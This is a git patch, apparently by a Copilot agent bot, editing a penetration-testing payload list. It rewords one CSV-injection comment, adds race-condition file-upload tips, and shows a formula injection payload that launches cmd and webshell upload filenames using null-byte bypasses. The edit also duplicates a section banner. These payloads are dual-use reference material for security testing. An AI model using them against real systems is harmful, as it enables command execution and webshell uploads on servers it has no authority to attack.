From c7627288f34848815031a104f798db08a81ca7bd Mon Sep 17 00:00:00 2001
From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com>
Date: Sun, 4 Jan 2026 19:48:54 +0000
Subject: [PATCH] Minor improvements to payload documentation and clarity

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
---
 CSV-Injection/csv-injection-payloads.txt | 2 +-
 File-Upload/file-upload-payloads.txt     | 4 ++++
 2 files changed, 5 insertions(+), 1 deletion(-)

diff --git a/CSV-Injection/csv-injection-payloads.txt b/CSV-Injection/csv-injection-payloads.txt
index 25fd8a3..f734884 100644
--- a/CSV-Injection/csv-injection-payloads.txt
+++ b/CSV-Injection/csv-injection-payloads.txt
@@ -238,7 +238,7 @@ Review: +cmd|'/c calc'!A1
 
 # Circular references
 =A1
-(in cell A1 itself, causes circular reference)
+# Note: When placed in cell A1 itself, this causes a circular reference error
 
 # ============================
 # Remote File Inclusion
diff --git a/File-Upload/file-upload-payloads.txt b/File-Upload/file-upload-payloads.txt
index 12274e9..d9c5590 100644
--- a/File-Upload/file-upload-payloads.txt
+++ b/File-Upload/file-upload-payloads.txt
@@ -488,12 +488,16 @@ Upload to misconfigured alias/location
 shell.jsp%00.jpg
 shell.jspx
 
+# ============================
+# RACE CONDITION FILE UPLOAD
 # ============================
 # RACE CONDITION FILE UPLOAD
 # ============================
 
 # Upload file quickly and access before validation/deletion
 # Technique: Concurrent upload and access requests
+# Example: Upload shell.php and immediately request http://target.com/uploads/shell.php
+# Use tools like Burp Suite Turbo Intruder or custom scripts to send simultaneous requests
 
 # ============================
 # FILE UPLOAD WITH SIZE BYPASS